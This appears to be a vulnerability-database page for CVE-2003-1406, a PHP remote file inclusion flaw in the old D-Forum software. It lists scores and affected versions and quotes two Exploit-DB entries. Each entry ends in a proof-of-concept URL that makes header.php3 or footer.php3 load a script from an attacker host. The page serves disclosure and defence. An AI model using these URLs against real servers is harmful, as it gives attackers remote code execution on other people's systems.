CVE-2003-1406
Published 2003-12-31
Priority: P3 · 37 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.53% (82.9th percentile)
PHP remote file inclusion vulnerability in D-Forum 1.00 through 1.11 allows remote attackers to execute arbitrary PHP code via a URL in the (1) my_header parameter to header.php3 or (2) my_footer parameter to footer.php3.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adalis_infomatique | d_forum | — | — |
| adalis_infomatique | d_forum | — | — |
| adalis_infomatique | d_forum | — | — |
No detection rules found.
Exploit-DB
D-Forum 1 - 'header' Remote File Inclusion
exploitdb·2003-02-18
---
source: https://www.securityfocus.com/bid/6879/info
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters.
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
Exploit-DB
D-Forum 1 - 'footer' Remote File Inclusion
exploitdb·2003-02-18
---
source: https://www.securityfocus.com/bid/6879/info
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters.
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0072.html
http://www.securityfocus.com/bid/6879
https://exchange.xforce.ibmcloud.com/vulnerabilities/11342